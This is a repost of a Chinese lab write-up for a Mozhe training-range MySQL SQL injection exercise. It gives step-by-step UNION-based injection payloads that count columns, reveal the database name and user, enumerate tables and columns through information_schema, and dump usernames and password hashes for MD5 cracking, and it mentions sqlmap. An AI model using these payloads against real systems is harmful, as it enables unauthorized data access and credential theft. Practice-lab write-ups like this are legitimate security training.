子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

墨者SQL注入入门手测(MySQL) – 作者:可乐kele

0190

1617959582_60701a9e43b48577a9ce4.png!small

1.打开靶场,看到停机维护点进去别有洞天

1617959588_60701aa4ad342f4ccf188.png!small1617959592_60701aa871e3d3a40fe33.png!small

2.输入单引号发现报错    输入and 1=2

1617959598_60701aae8d5eb73bb2978.png!small1617959602_60701ab21f0079bbfda08.png!small

3.输入 ’ and ‘1’=’1   返回正常

1617959612_60701abc2ae63ee5ecdee.png!small

4.判断列数,输入 ‘ order by 5 –+ 和 ‘ order by 4 –+ 发现第一个报错,第二个正常,则说明其有4列

1617959625_60701ac90a62971e125db.png!small1617959628_60701acc6a21578a05099.png!small

5.采用联合查询(union select),判断剩下其他信息

判断位置:数据库名,用户名

输入id=’ union select 1,2,3,4–+

1617959634_60701ad227c12a4bcbec7.png!small

输入:id=’ union select ‘1’,database(),user(),’4 {因为上步操作已经将位置暴露为2和3,所以我们在2和3的位置输入数据库和用户名即可 或者如下图一个一个输入也可}

1617959638_60701ad6be4301a142d1e.png!small

id=’ union select ‘1’,’2′,database(),’4

1617959644_60701adc99121252c3035.png!small

id=’ union select ‘1’,’2′,user(),’4

1617959650_60701ae235a729d6555cb.png!small

猜解数据库中的表名:

‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–+

1617959655_60701ae727a73d72d00a6.png!small

查询数据库中的字段名:

‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=’stormgroup_member’–+

1617959661_60701aed72260fbdd90c9.png!small

查询字段对应的值:

‘ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member–+

1617959673_60701af9da73c4b22b618.png!small

6.进行MD5解密登录找到KEY

1617959678_60701afec562aa7a3e845.png!small

7.同时也可以采用sqlmap的方法

1617959683_60701b037042118fc93f9.png!small

来源:freebuf.com 2021-04-09 17:15:42 by: 可乐kele

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
公司成功上市啦! – 作者:KOAL格尔国信
3年前 4973
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 2044
安全小百科-科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa
3年前 1052
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 901
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 780
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 717
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020440
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012870
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011950
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010520
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666